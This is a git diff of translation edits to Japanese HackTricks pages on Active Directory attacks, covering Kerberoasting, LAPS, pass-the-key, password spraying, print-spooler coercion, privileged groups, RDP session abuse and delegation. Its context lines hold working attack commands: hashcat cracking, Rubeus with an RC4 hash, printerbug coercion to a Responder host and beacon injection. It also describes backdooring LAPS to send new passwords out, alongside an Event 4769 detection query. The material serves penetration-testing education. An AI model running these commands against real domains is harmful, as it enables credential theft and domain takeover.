+Kerberoastingは、**Active Directory (AD)**内の**ユーザーアカウント**に関連する**TGSチケット**の取得に焦点を当てており、**コンピューターアカウント**は除外されます。これらのチケットの暗号化は**ユーザーパスワード**から派生したキーを利用しており、**オフラインの資格情報クラッキング**の可能性を許可します。サービスとしてのユーザーアカウントの使用は、非空の**"ServicePrincipalName"**プロパティによって示されます。
 
-**Kerberoasting**を実行するには、**TGSチケット**を要求できるドメインアカウントが必要ですが、このプロセスは**特別な権限**を必要とせず、**有効なドメイン資格情報**を持つ誰でもアクセス可能です。
+**Kerberoasting**を実行するには、**TGSチケット**を要求できるドメインアカウントが必要ですが、このプロセスは**特別な権限**を要求せず、**有効なドメイン資格情報**を持つ誰でもアクセス可能です。
 
 ### Key Points:
 
 - **Kerberoasting**は**AD**内の**ユーザーアカウントサービス**のための**TGSチケット**をターゲットにします。
-- **ユーーパスワード**からのキーで暗号化されたチケットは**オフラインでクラッキング**可能です。
+- **ユーザーパスワード**からのキーで暗号化されたチケットは**オフラインでクラッキング**可能です。
 - サービスは、nullでない**ServicePrincipalName**によって識別されます。
 - **特別な権限**は必要なく、**有効なドメイン資格情報**のみが必要です。
 
@@ -93,26 +93,26 @@ hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
 ```
 ### Persistence
 
-もしユーザーに対して**十分な権限**があれば、そのユーザーを**kerberoastable**にすることができます：
+ユーザーに対して**十分な権限**があれば、そのユーザーを**kerberoastable**にすることができます：
 ```bash
 Set-DomainObject -Identity <username> -Set @{serviceprincipalname='just/whateverUn1Que'} -verbose
 ```
 有用な**ツール**はここで見つけることができます: [https://github.com/nidem/kerberoast](https://github.com/nidem/kerberoast)
 
-Linuxからこの**エラー**が表示された場合: **`Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)`** これはローカル時間のためで、ホストをDCと同期させる必要があります。いくつかのオプションがあります:
+Linuxからこの**エラー**が表示された場合: **`Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)`** は、ローカル時間が原因です。ホストをDCと同期させる必要があります。いくつかのオプションがあります:
 
 - `ntpdate <IP of DC>` - Ubuntu 16.04以降は非推奨
 - `rdate -n <IP of DC>`
 
 ### 緩和策
 
-Kerberoastingは、悪用可能な場合、高度な隠密性で実施できます。この活動を検出するためには、**Security Event ID 4769**に注意を払う必要があります。これはKerberosチケットが要求されたことを示します。しかし、このイベントの頻度が高いため、疑わしい活動を特定するために特定のフィルターを適用する必要があります:
+Kerberoastingは、悪用可能な場合、高度な隠密性で実施できます。この活動を検出するためには、**Security Event ID 4769**に注意を払う必要があります。これは、Kerberosチケットが要求されたことを示します。しかし、このイベントの頻度が高いため、疑わしい活動を特定するために特定のフィルターを適用する必要があります:
 
 - サービス名は**krbtgt**であってはならず、これは通常のリクエストです。
 - **$**で終わるサービス名は、サービスに使用されるマシンアカウントを含まないように除外する必要があります。
 - マシンからのリクエストは、**machine@domain**形式のアカウント名を除外することでフィルタリングする必要があります。
 - 成功したチケットリクエストのみを考慮し、失敗コード**'0x0'**で識別します。
-- **最も重要なこと**は、チケット暗号化タイプが**0x17**である必要があり、これはKerberoasting攻撃でよく使用されます。
+- **最も重要なこと**は、チケットの暗号化タイプが**0x17**である必要があり、これはKerberoasting攻撃でよく使用されます。
 ```bash
 Get-WinEvent -FilterHashtable @{Logname='Security';ID=4769} -MaxEvents 1000 | ?{$_.Message.split("`n")[8] -ne 'krbtgt' -and $_.Message.split("`n")[8] -ne '*$' -and $_.Message.split("`n")[3] -notlike '*$@*' -and $_.Message.split("`n")[18] -like '*0x0*' -and $_.Message.split("`n")[17] -like "*0x17*"} | select ExpandProperty message
 ```
diff --git a/src/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md b/src/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
index 79f529b3e..fae55e68b 100644
--- a/src/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
+++ b/src/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
@@ -17,7 +17,7 @@ Kerberosの「ダブルホップ」問題は、攻撃者が**2つのホップ**
 
 ### Unconstrained Delegation
 
-PCで**制約のない委任**が有効になっている場合、これは発生しません。なぜなら、**サーバー**はアクセスする各ユーザーの**TGT**を取得するからです。さらに、制約のない委任が使用される場合、**ドメインコントローラー**を**侵害**する可能性があります。\
+PCで**制約のない委任**が有効になっている場合、これは発生しません。なぜなら、**サーバー**はアクセスする各ユーザーの**TGT**を取得するからです。さらに、制約のない委任が使用される場合、**ドメインコントローラーを侵害する**可能性があります。\
 [**制約のない委任ページの詳細**](unconstrained-delegation.md)。
 
 ### CredSSP
@@ -47,7 +47,7 @@ Invoke-Command -ComputerName secdev -Credential $cred -ScriptBlock {hostname}
 
 ### PSSession構成の登録
 
-ダブルホップの問題を回避するための解決策は、`Enter-PSSession`とともに`Register-PSSessionConfiguration`を使用することです。この方法は`evil-winrm`とは異なるアプローチを必要とし、ダブルホップの制限を受けないセッションを可能にします。
+ダブルホップ問題を回避するための解決策は、`Enter-PSSession`とともに`Register-PSSessionConfiguration`を使用することです。この方法は`evil-winrm`とは異なるアプローチを必要とし、ダブルホップの制限を受けないセッションを可能にします。
 ```powershell
 Register-PSSessionConfiguration -Name doublehopsess -RunAsCredential domain_name\username
 Restart-Service WinRM
@@ -56,7 +56,7 @@ klist
 ```
 ### PortForwarding
 
-中間ターゲットのローカル管理者にとって、ポートフォワーディングは最終サーバーにリクエストを送信できるようにします。`netsh`を使用して、ポートフォワーディングのルールを追加し、転送されたポートを許可するWindowsファイアウォールルールを追加できます。
+中間ターゲットのローカル管理者にとって、ポートフォワーディングはリクエストを最終サーバーに送信できるようにします。`netsh`を使用して、ポートフォワーディングのルールを追加し、転送されたポートを許可するWindowsファイアウォールルールを追加できます。
 ```bash
 netsh interface portproxy add v4tov4 listenport=5446 listenaddress=10.35.8.17 connectport=5985 connectaddress=10.35.8.23
 netsh advfirewall firewall add rule name=fwd dir=in action=allow protocol=TCP localport=5446
@@ -69,9 +69,9 @@ winrs -r:http://bizintel:5446 -u:ta\redsuit -p:2600leet hostname
 ```
 ### OpenSSH
 
-最初のサーバーにOpenSSHをインストールすることで、ダブルホップの問題に対する回避策が有効になり、特にジャンプボックスシナリオに役立ちます。この方法では、Windows用のOpenSSHのCLIインストールと設定が必要です。パスワード認証用に構成されると、これにより中間サーバーがユーザーの代わりにTGTを取得できます。
+最初のサーバーにOpenSSHをインストールすることで、ダブルホップの問題に対する回避策が有効になり、特にジャンプボックスシナリオに役立ちます。この方法では、Windows用のOpenSSHのCLIインストールと設定が必要です。パスワード認証用に設定されると、これにより中間サーバーがユーザーの代わりにTGTを取得できます。
 
-#### OpenSSH インストール手順
+#### OpenSSHインストール手順
 
 1. 最新のOpenSSHリリースzipをダウンロードしてターゲットサーバーに移動します。
 2. 解凍して`Install-sshd.ps1`スクリプトを実行します。
diff --git a/src/windows-hardening/active-directory-methodology/laps.md b/src/windows-hardening/active-directory-methodology/laps.md
index 815b24841..8e409f6d3 100644
--- a/src/windows-hardening/active-directory-methodology/laps.md
+++ b/src/windows-hardening/active-directory-methodology/laps.md
@@ -2,11 +2,12 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
+
 ## 基本情報
 
-Local Administrator Password Solution (LAPS) は、**管理者パスワード**を管理するためのツールであり、これらのパスワードは**ユニークでランダム化され、頻繁に変更されます**。これらはドメインに参加しているコンピュータに適用されます。これらのパスワードはActive Directory内に安全に保存されており、アクセス制御リスト (ACL) を通じて権限を付与されたユーザーのみがアクセスできます。クライアントからサーバーへのパスワードの送信のセキュリティは、**Kerberos version 5** と **Advanced Encryption Standard (AES)** の使用によって確保されています。
+Local Administrator Password Solution (LAPS) は、**管理者パスワード**を管理するためのツールであり、これらのパスワードは**ユニークでランダム化され、頻繁に変更されます**。これらはドメインに参加しているコンピュータに適用されます。これらのパスワードはActive Directory内に安全に保存され、アクセス制御リスト（ACL）を通じて権限を付与されたユーザーのみがアクセスできます。クライアントからサーバーへのパスワード送信のセキュリティは、**Kerberos version 5** と **Advanced Encryption Standard (AES)** の使用によって確保されています。
 
-ドメインのコンピュータオブジェクトにおいて、LAPSの実装は2つの新しい属性の追加をもたらします: **`ms-mcs-AdmPwd`** と **`ms-mcs-AdmPwdExpirationTime`**。これらの属性はそれぞれ、**平文の管理者パスワード**と**その有効期限**を保存します。
+ドメインのコンピュータオブジェクトにおいて、LAPSの実装により、2つの新しい属性が追加されます：**`ms-mcs-AdmPwd`** と **`ms-mcs-AdmPwdExpirationTime`**。これらの属性は、それぞれ**平文の管理者パスワード**と**その有効期限**を保存します。
 
 ### 有効化されているか確認する
 ```bash
@@ -23,9 +24,9 @@ Get-DomainObject -SearchBase "LDAP://DC=sub,DC=domain,DC=local" | ? { $_."ms-mcs
 ```
 ### LAPS パスワードアクセス
 
-あなたは **生の LAPS ポリシーをダウンロードすることができます** `\\dc\SysVol\domain\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol` そして **`Parse-PolFile`** を使用することができます [**GPRegistryPolicyParser**](https://github.com/PowerShell/GPRegistryPolicyParser) パッケージから、このファイルを人間が読みやすい形式に変換するために。
+あなたは **生の LAPS ポリシーをダウンロード** することができます `\\dc\SysVol\domain\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol` そして **`Parse-PolFile`** を使用することができます [**GPRegistryPolicyParser**](https://github.com/PowerShell/GPRegistryPolicyParser) パッケージから、このファイルを人間が読みやすい形式に変換します。
 
-さらに、**ネイティブ LAPS PowerShell cmdlets** は、私たちがアクセスできるマシンにインストールされている場合に使用できます：
+さらに、**ネイティブ LAPS PowerShell cmdlets** は、アクセスできるマシンにインストールされている場合に使用できます:
 ```powershell
 Get-Command *AdmPwd*
 
@@ -56,9 +57,9 @@ Get-DomainObject -Identity wkstn-2 -Properties ms-Mcs-AdmPwd
 ```
 ### LAPSToolkit
 
-[LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit) は、いくつかの機能を使用して LAPS の列挙を容易にします。\
-その一つは、**LAPS が有効なすべてのコンピュータ**のために **`ExtendedRights`** を解析することです。これにより、**LAPS パスワードを読み取るために特に委任されたグループ**が表示され、これらはしばしば保護されたグループのユーザーです。\
-**コンピュータ**をドメインに参加させた **アカウント** は、そのホストに対して `All Extended Rights` を受け取り、この権利により **パスワードを読み取る** 能力が与えられます。列挙により、ホスト上で LAPS パスワードを読み取ることができるユーザーアカウントが表示されることがあります。これにより、LAPS パスワードを読み取ることができる特定の AD ユーザーを **ターゲットにする** のに役立ちます。
+[LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit)は、いくつかの機能を使用してLAPSの列挙を容易にします。\
+その一つは、**LAPSが有効なすべてのコンピュータ**のために**`ExtendedRights`**を解析することです。これにより、**LAPSパスワードを読み取るために特に委任されたグループ**が表示され、これらはしばしば保護されたグループのユーザーです。\
+**コンピュータ**をドメインに**参加させたアカウント**は、そのホストに対して`All Extended Rights`を受け取り、この権利により**パスワードを読み取る**能力が与えられます。列挙により、ホスト上でLAPSパスワードを読み取ることができるユーザーアカウントが表示されることがあります。これにより、LAPSパスワードを読み取ることができる特定のADユーザーを**ターゲットにする**のに役立ちます。
 ```powershell
 # Get groups that can read passwords
 Find-LAPSDelegatedGroups
@@ -112,13 +113,13 @@ Get-DomainObject -Identity computer-21 -Properties ms-mcs-admpwdexpirationtime
 Set-DomainObject -Identity wkstn-2 -Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}
 ```
 > [!WARNING]
-> パスワードは、**admin**が**`Reset-AdmPwdPassword`** cmdletを使用した場合、またはLAPS GPOで**パスワードの有効期限をポリシーで要求されるよりも長く設定しない**が有効になっている場合でもリセットされます。
+> パスワードは、**admin**が**`Reset-AdmPwdPassword`** cmdletを使用した場合、またはLAPS GPOで**パスワードの有効期限をポリシーで要求されるよりも長くしない**が有効になっている場合でもリセットされます。
 
 ### バックドア
 
-LAPSの元のソースコードは[こちら](https://github.com/GreyCorbel/admpwd)で見つけることができるため、コードにバックドアを仕込むことが可能です（例えば、`Main/AdmPwd.PS/Main.cs`の`Get-AdmPwdPassword`メソッド内）で、新しいパスワードを**外部に送信したり、どこかに保存したり**することができます。
+LAPSの元のソースコードは[こちら](https://github.com/GreyCorbel/admpwd)で見つけることができるため、コードにバックドアを仕込むことが可能です（例えば、`Main/AdmPwd.PS/Main.cs`の`Get-AdmPwdPassword`メソッド内）で、新しいパスワードを**外部に流出させるか、どこかに保存する**ことができます。
 
-その後、新しい`AdmPwd.PS.dll`をコンパイルし、`C:\Tools\admpwd\Main\AdmPwd.PS\bin\Debug\AdmPwd.PS.dll`にアップロードします（そして、修正時間を変更します）。
+その後、新しい`AdmPwd.PS.dll`をコンパイルし、`C:\Tools\admpwd\Main\AdmPwd.PS\bin\Debug\AdmPwd.PS.dll`にアップロードします（そして、変更時間を変更します）。
 
 ## 参考文献
 
diff --git a/src/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md b/src/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md
index 2ebf7bf21..6f0429c41 100644
--- a/src/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md
+++ b/src/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md
@@ -24,7 +24,7 @@ Rubeus.exeを使用した別のコマンドシーケンスは、この技術の
 .\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt
 .\PsExec.exe -accepteula \\labwws02.jurassic.park cmd
 ```
-この方法は**Pass the Key**アプローチを反映しており、認証目的でチケットを直接指揮し利用することに焦点を当てています。TGTリクエストの開始はイベント`4768: A Kerberos authentication ticket (TGT) was requested`をトリガーし、デフォルトでRC4-HMACの使用を示しますが、現代のWindowsシステムはAES256を好みます。
+この方法は**Pass the Key**アプローチを反映しており、認証目的でチケットを直接操作し利用することに焦点を当てています。TGTリクエストの開始は、イベント`4768: A Kerberos authentication ticket (TGT) was requested`をトリガーし、デフォルトでRC4-HMACの使用を示しますが、最新のWindowsシステムはAES256を好みます。
 
 運用セキュリティに準拠し、AES256を使用するには、次のコマンドを適用できます：
 ```bash
diff --git a/src/windows-hardening/active-directory-methodology/pass-the-ticket.md b/src/windows-hardening/active-directory-methodology/pass-the-ticket.md
index f903ebd45..641e3f81d 100644
--- a/src/windows-hardening/active-directory-methodology/pass-the-ticket.md
+++ b/src/windows-hardening/active-directory-methodology/pass-the-ticket.md
@@ -4,7 +4,7 @@
 
 ## パス・ザ・チケット (PTT)
 
-**パス・ザ・チケット (PTT)** 攻撃手法では、攻撃者は **ユーザーの認証チケットを盗む** ことで、パスワードやハッシュ値を盗むのではありません。この盗まれたチケットは **ユーザーになりすます** ために使用され、ネットワーク内のリソースやサービスに不正にアクセスします。
+**パス・ザ・チケット (PTT)** 攻撃手法では、攻撃者は **ユーザーの認証チケットを盗む** ことで、パスワードやハッシュ値を盗むのではありません。この盗まれたチケットは、**ユーザーを偽装する** ために使用され、ネットワーク内のリソースやサービスへの不正アクセスを得ることができます。
 
 **読む**:
 
diff --git a/src/windows-hardening/active-directory-methodology/password-spraying.md b/src/windows-hardening/active-directory-methodology/password-spraying.md
index 6f993fc95..8f7f8e9c6 100644
--- a/src/windows-hardening/active-directory-methodology/password-spraying.md
+++ b/src/windows-hardening/active-directory-methodology/password-spraying.md
@@ -1,19 +1,19 @@
-# パスワードスプレイング / ブルートフォース
+# パスワードスプレー / ブルートフォース
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## **パスワードスプレイング**
+## **パスワードスプレー**
 
 いくつかの**有効なユーザー名**を見つけたら、発見した各ユーザーに対して最も**一般的なパスワード**を試すことができます（環境のパスワードポリシーを考慮してください）。\
 **デフォルト**では、**最小****パスワード****長**は**7**です。
 
 一般的なユーザー名のリストも役立つかもしれません: [https://github.com/insidetrust/statistically-likely-usernames](https://github.com/insidetrust/statistically-likely-usernames)
 
-いくつかの間違ったパスワードを試すと**アカウントがロックアウトされる可能性があることに注意してください**（デフォルトでは10回以上）。
+いくつかの間違ったパスワードを試すと、**アカウントがロックアウトされる可能性があることに注意してください**（デフォルトでは10回以上）。
 
 ### パスワードポリシーを取得する
 
-ユーザーの資格情報やドメインユーザーとしてのシェルがある場合は、**次のコマンドでパスワードポリシーを取得できます**:
+ユーザーの資格情報やドメインユーザーとしてのシェルがある場合、**次のコマンドでパスワードポリシーを取得できます**:
 ```bash
 # From Linux
 crackmapexec <IP> -u 'user' -p 'password' --pass-pol
@@ -117,7 +117,7 @@ Outlookに対するp**assword spraying**のための複数のツールがあり
 - [https://github.com/Rhynorater/Okta-Password-Sprayer](https://github.com/Rhynorater/Okta-Password-Sprayer)
 - [https://github.com/knavesec/CredMaster](https://github.com/knavesec/CredMaster)
 
-## 参考文献
+## References
 
 - [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying)
 - [https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell](https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell)
diff --git a/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md b/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md
index 3c644b83f..c677cba00 100644
--- a/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md
+++ b/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md
@@ -4,16 +4,16 @@
 
 ## SharpSystemTriggers
 
-[**SharpSystemTriggers**](https://github.com/cube0x0/SharpSystemTriggers) は、3rd party依存関係を避けるためにMIDLコンパイラを使用してC#でコーディングされた**リモート認証トリガー**の**コレクション**です。
+[**SharpSystemTriggers**](https://github.com/cube0x0/SharpSystemTriggers) は、**3rd party依存関係を避けるためにMIDLコンパイラを使用してC#でコーディングされた** **リモート認証トリガーのコレクション**です。
 
 ## スプーラーサービスの悪用
 
-_**Print Spooler**_ サービスが**有効**な場合、既知のAD資格情報を使用してドメインコントローラーの印刷サーバーに新しい印刷ジョブの**更新**を**要求**し、**通知を特定のシステムに送信するように指示**できます。\
-プリンターが任意のシステムに通知を送信する際には、その**システム**に対して**認証**を行う必要があります。したがって、攻撃者は_**Print Spooler**_ サービスを任意のシステムに対して認証させることができ、その認証では**コンピューターアカウント**が使用されます。
+_**Print Spooler**_ サービスが **有効** の場合、既知のAD資格情報を使用して、ドメインコントローラーの印刷サーバーに新しい印刷ジョブの **更新** を **要求** し、通知を **特定のシステムに送信するように指示** できます。\
+プリンターが任意のシステムに通知を送信する際には、その **システムに対して認証する必要があります**。したがって、攻撃者は _**Print Spooler**_ サービスを任意のシステムに対して認証させることができ、その認証では **コンピュータアカウント** を使用します。
 
-### ドメイン上のWindowsサーバーの発見
+### ドメイン上のWindowsサーバーの検索
 
-PowerShellを使用してWindowsボックスのリストを取得します。サーバーは通常優先されるため、そこに焦点を当てましょう：
+PowerShellを使用して、Windowsボックスのリストを取得します。サーバーは通常優先されるため、そこに焦点を当てましょう：
 ```bash
 Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt
 ```
@@ -28,7 +28,7 @@ Linux上でrpcdump.pyを使用し、MS-RPRNプロトコルを探すこともで
 ```bash
 rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN
 ```
-### 任意のホストに対してサービスに認証を要求する
+### サービスに任意のホストに対して認証を要求させる
 
 [ **ここからSpoolSampleをコンパイルできます**](https://github.com/NotMedic/NetNTLMtoSilverTicket)**.**
 ```bash
@@ -41,7 +41,7 @@ printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>
 ```
 ### Unconstrained Delegationとの組み合わせ
 
-攻撃者がすでに[Unconstrained Delegation](unconstrained-delegation.md)でコンピュータを侵害している場合、攻撃者は**プリンタをこのコンピュータに対して認証させる**ことができます。制約のない委任のため、**プリンタのコンピュータアカウントのTGT**は、制約のない委任を持つコンピュータの**メモリ**に**保存されます**。攻撃者がすでにこのホストを侵害しているため、**このチケットを取得し**、それを悪用することができます（[Pass the Ticket](pass-the-ticket.md)）。
+攻撃者がすでに[Unconstrained Delegation](unconstrained-delegation.md)でコンピュータを侵害している場合、攻撃者は**プリンタをこのコンピュータに対して認証させる**ことができます。制約のない委任のため、**プリンタのコンピュータアカウントのTGT**は、制約のない委任を持つコンピュータの**メモリ**に**保存されます**。攻撃者はすでにこのホストを侵害しているため、**このチケットを取得し**、それを悪用することができます（[Pass the Ticket](pass-the-ticket.md)）。
 
 ## RCP強制認証
 
@@ -49,13 +49,13 @@ printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>
 
 ## PrivExchange
 
-`PrivExchange`攻撃は、**Exchange Serverの`PushSubscription`機能**に見つかった欠陥の結果です。この機能により、メールボックスを持つ任意のドメインユーザーがHTTP経由で任意のクライアント提供ホストに対してExchangeサーバーを強制的に認証させることができます。
+`PrivExchange`攻撃は、**Exchange Serverの`PushSubscription`機能**に見つかった欠陥の結果です。この機能により、メールボックスを持つ任意のドメインユーザーがHTTPを介して任意のクライアント提供ホストに対してExchangeサーバーを強制的に認証させることができます。
 
 デフォルトでは、**ExchangeサービスはSYSTEMとして実行され**、過剰な特権が与えられています（具体的には、**2019年以前の累積更新に対するWriteDacl特権を持っています**）。この欠陥は、**情報をLDAPに中継し、その後ドメインNTDSデータベースを抽出する**ために悪用できます。LDAPへの中継が不可能な場合でも、この欠陥はドメイン内の他のホストに中継および認証するために使用できます。この攻撃の成功した悪用は、認証された任意のドメインユーザーアカウントでドメイン管理者への即時アクセスを許可します。
 
 ## Windows内部
 
-すでにWindowsマシン内にいる場合、特権アカウントを使用してサーバーに接続するようWindowsを強制することができます。
+すでにWindowsマシン内にいる場合、特権アカウントを使用してサーバーに接続するようWindowsを強制することができます：
 
 ### Defender MpCmdRun
 ```bash
@@ -103,6 +103,6 @@ certutil.exe -syncwithWU  \\127.0.0.1\share
 ## NTLMv1のクラッキング
 
 [NTLMv1チャレンジをキャプチャできる場合は、ここでそれをクラッキングする方法を読んでください](../ntlm/#ntlmv1-attack)。\
-&#xNAN;_&#x52;emember NTLMv1をクラッキングするには、Responderチャレンジを「1122334455667788」に設定する必要があります_
+&#xNAN;_&#x52;emember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"_
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md b/src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md
index e8a1098cf..f632db78b 100644
--- a/src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md
+++ b/src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md
@@ -10,7 +10,7 @@
 
 ## アカウントオペレーター
 
-このグループは、ドメイン上で管理者でないアカウントやグループを作成する権限を持っています。さらに、ドメインコントローラー（DC）へのローカルログインを可能にします。
+このグループは、ドメイン上の管理者でないアカウントやグループを作成する権限を持っています。さらに、ドメインコントローラー（DC）へのローカルログインを可能にします。
 
 このグループのメンバーを特定するために、次のコマンドが実行されます：
 ```powershell
@@ -130,7 +130,7 @@ echo "Y" | wbadmin start recovery -version:<date-time> -itemtype:file -items:c:\
 
 ## DnsAdmins
 
-**DnsAdmins**グループのメンバーは、DNSサーバー上でSYSTEM権限を持つ任意のDLLをロードするためにその権限を悪用できます。これは通常、ドメインコントローラー上でホストされています。この能力は、重大な悪用の可能性を提供します。
+**DnsAdmins**グループのメンバーは、DNSサーバー上でSYSTEM権限を持つ任意のDLLをロードするためにその権限を悪用できます。これは通常、ドメインコントローラー上でホストされています。この機能は、重大な悪用の可能性を提供します。
 
 DnsAdminsグループのメンバーをリストするには、次のコマンドを使用します：
 ```powershell
@@ -174,7 +174,7 @@ sc.exe \\dc01 start dns
 DnsAdminsは、グローバルクエリブロックリストを無効にした後にWPADレコードを作成することで、DNSレコードを操作してMan-in-the-Middle (MitM) 攻撃を実行できます。ResponderやInveighのようなツールを使用して、スプーフィングやネットワークトラフィックのキャプチャが可能です。
 
 ### イベントログリーダー
-メンバーはイベントログにアクセスでき、プレーンテキストのパスワードやコマンド実行の詳細など、機密情報を見つける可能性があります。
+メンバーはイベントログにアクセスでき、平文のパスワードやコマンド実行の詳細など、機密情報を見つける可能性があります。
 ```powershell
 # Get members and search logs for sensitive information
 Get-NetGroupMember -Identity "Event Log Readers" -Recurse
@@ -203,13 +203,13 @@ sc.exe start MozillaMaintenance
 
 ## 組織管理
 
-**Microsoft Exchange** が展開されている環境では、**Organization Management** と呼ばれる特別なグループが重要な権限を持っています。このグループは **すべてのドメインユーザーのメールボックスにアクセスする** 特権を持ち、**'Microsoft Exchange Security Groups'** 組織単位 (OU) に対して **完全な制御** を維持しています。この制御には、特権昇格に悪用可能な **`Exchange Windows Permissions`** グループが含まれます。
+**Microsoft Exchange**が展開されている環境では、**Organization Management**と呼ばれる特別なグループが重要な権限を持っています。このグループは**すべてのドメインユーザーのメールボックスにアクセスする**特権を持ち、**'Microsoft Exchange Security Groups'**の組織単位（OU）に対して**完全な制御**を維持しています。この制御には、特権昇格に悪用される可能性のある**`Exchange Windows Permissions`**グループが含まれます。
 
 ### 特権の悪用とコマンド
 
 #### プリントオペレーター
 
-**Print Operators** グループのメンバーは、**`SeLoadDriverPrivilege`** を含むいくつかの特権を付与されており、これにより **ドメインコントローラーにローカルでログオン** し、シャットダウンし、プリンターを管理することができます。これらの特権を悪用するには、特に **`SeLoadDriverPrivilege`** が昇格されていないコンテキストで表示されない場合、ユーザーアカウント制御 (UAC) をバイパスする必要があります。
+**Print Operators**グループのメンバーは、**`SeLoadDriverPrivilege`**を含むいくつかの特権を持っており、これにより**ドメインコントローラーにローカルでログオン**し、シャットダウンし、プリンターを管理することができます。これらの特権を悪用するには、特に**`SeLoadDriverPrivilege`**が昇格されていないコンテキストで表示されない場合、ユーザーアカウント制御（UAC）をバイパスする必要があります。
 
 このグループのメンバーをリストするには、次のPowerShellコマンドが使用されます:
 ```powershell
diff --git a/src/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md b/src/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md
index 69cae538c..0fa56e247 100644
--- a/src/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md
+++ b/src/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md
@@ -30,11 +30,11 @@ PID   PPID  Name                         Arch  Session     User
 beacon> inject 4960 x64 tcp-local
 ## From that beacon you can just run powerview modules interacting with the external domain as that user
 ```
-他のツールを使用してセッションを盗む**他の方法**を確認してください [**このページで。**](../../network-services-pentesting/pentesting-rdp.md#session-stealing)
+他のツールを使用してセッションを盗む**他の方法を確認してください** [**このページで。**](../../network-services-pentesting/pentesting-rdp.md#session-stealing)
 
 ## RDPInception
 
-ユーザーが**RDPを介してマシンにアクセス**し、**攻撃者**が**待機**している場合、攻撃者は**ユーザーのRDPセッションにビーコンを注入**することができ、**被害者がRDP経由でアクセスする際にドライブをマウント**していれば、**攻撃者はそれにアクセスできる**。
+ユーザーが**RDPを介してマシンにアクセス**し、**攻撃者**が**待機**している場合、攻撃者は**ユーザーのRDPセッションにビーコンを注入**することができ、**被害者がRDP経由でアクセスする際にドライブをマウントした場合、**攻撃者はそれにアクセスできる**。
 
 この場合、**被害者の** **元のコンピュータ**を**バックドア**を**スタートアップフォルダ**に書き込むことで**妥協**することができます。
 ```powershell
diff --git a/src/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md b/src/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md
index b73d14713..e52345fb0 100644
--- a/src/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md
+++ b/src/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md
@@ -4,9 +4,9 @@
 
 ## リソースベースの制約付き委任の基本
 
-これは基本的な [Constrained Delegation](constrained-delegation.md) に似ていますが、**サービスに対して任意のユーザーを偽装するための** **オブジェクト**に権限を与えるのではなく、リソースベースの制約付き委任は、**そのオブジェクトに対して任意のユーザーを偽装できる人を設定します**。
+これは基本的な [Constrained Delegation](constrained-delegation.md) に似ていますが、**サービスに対して任意のユーザーを偽装する**ための**オブジェクト**に権限を与えるのではなく、リソースベースの制約付き委任は**そのオブジェクトに対して任意のユーザーを偽装できる者を設定します**。
 
-この場合、制約付きオブジェクトには、任意の他のユーザーを偽装できるユーザーの名前を持つ属性 _**msDS-AllowedToActOnBehalfOfOtherIdentity**_ が存在します。
+この場合、制約付きオブジェクトには、任意の他のユーザーを偽装できるユーザーの名前を持つ _**msDS-AllowedToActOnBehalfOfOtherIdentity**_ という属性があります。
 
 この制約付き委任と他の委任との重要な違いは、**マシンアカウントに対する書き込み権限** (_GenericAll/GenericWrite/WriteDacl/WriteProperty/etc_) を持つ任意のユーザーが _**msDS-AllowedToActOnBehalfOfOtherIdentity**_ を設定できることです（他の委任の形式ではドメイン管理者の特権が必要でした）。
 
@@ -15,21 +15,21 @@
 制約付き委任では、ユーザーの _userAccountControl_ 値内の **`TrustedToAuthForDelegation`** フラグが **S4U2Self** を実行するために必要であると述べられていました。しかし、それは完全に真実ではありません。\
 実際には、その値がなくても、**サービス**（SPNを持つ）であれば任意のユーザーに対して **S4U2Self** を実行できますが、**`TrustedToAuthForDelegation`** を持っている場合、返される TGS は **Forwardable** になります。もしそのフラグを持っていない場合、返される TGS は **Forwardable** ではありません。
 
